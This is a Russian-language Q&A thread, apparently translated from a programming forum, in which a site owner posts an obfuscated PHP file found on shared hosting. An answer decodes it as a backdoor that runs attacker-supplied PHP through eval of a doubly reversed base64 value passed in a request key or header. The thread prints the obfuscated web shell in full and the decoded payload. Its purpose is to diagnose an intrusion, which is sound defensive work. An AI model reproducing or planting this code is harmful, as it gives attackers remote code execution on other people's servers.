2015-05-27 4 views
-2

Около недели назад я заметил, что в корневой папке моего общего веб-хостинга появился, по-видимому, случайный PHP-файл. Имя файла - «hvkqwvkj.php», и я очень глупо удалил его, прежде чем я посмотрел информацию о владельце/группе и разрешении. Я хотел бы знать, что это такое и как он туда попал. Вот содержание этого файла:Случайно названный php-файл на моем сервере хостинга

<?php 
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t'; 
$jaquith= '"i_K4W';$canal ='(';$bookie='i'; 
$envies ='_n';$copyright='[email protected]'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy='; 
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a'; 
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8'; 
$diagonally='$5D(vn'; 

$beauregard ='S';$ines='te]ee'; $imogen = 's'; 

$irene ='("as3:0$r';$grassier ='4'; 

$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l'; 

$drudge='F'; 
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')'; 
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2'; 

$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3']. 

$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2']; 
$bob=$arraigning[3]; 

$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0]. 
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] . 

$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] . 
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain . 

$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0]. 
$commissioner[0].$firmware['3'] . 
$campanile . $arraigning['1']. $biller. 

$davida[2] . 
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1']. 
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] . 
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] . 
$closest['8']. $arraigning['1']. 
$jammed.$closest['0'].$closest['0'] .$jaquith['3']. 

$glutting['0'] . 

$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2']. 

$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] . 
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain. 
$davida[2] . 
$ines['0'] . $closest['2'] . 

$closest['8'] .$likeness. $contrivance[0]. 

$equivalently['0']. $foamed['2'] . $davida['0']. 
$enchain . 

$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham . 

$closest['8'] .$likeness .$contrivance[0] . 
$equivalently['0']. 
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions . 

$equivalently['0'] . 

$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance. 

$appliance . 

$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8']. 

$likeness.$contrivance[0]. 
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance . 
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5']. 
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] . 

$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] . 

$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3']. 
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] . 
$davida[2] . 

$closest['2']. 
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2']. 
$commissioner['2']. $commissioner['2'] . $commissioner['2']. 
$devoutness); 
+1

Вы были взломаны – umka

+0

Очевидно, нонсенс-файл, даже для самого новичка в программировании –

+1

На самом деле он делает материал, он определяет функцию, затем использует eval для ее выполнения. больше следовать. – geggleto

ответ

1

Я смог разобрать фактическое кодирование. Файл использует неясность, чтобы избежать обнаружения. Он определяет функцию, а затем использует eval для ее выполнения.

Здесь полезная нагрузка (важный бит).

//Take all types of request data and merge them 
//This opens up many types of attack vectors 
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER); 

//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and records its value if its set 
$a = isset($i["ndsswanu"] 
     ) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die); 

//execute it 
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64. 
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key. 
eval(strrev(base64_decode(strrev($a)))); 

Вы были верны, чтобы удалить их немедленно, однако это только признак большой проблемы. Как получилось, что сценарий стал гораздо более серьезным.

Этот код позволит злоумышленнику удаленно запускать любой php-код с помощью разнообразного количества векторов атаки.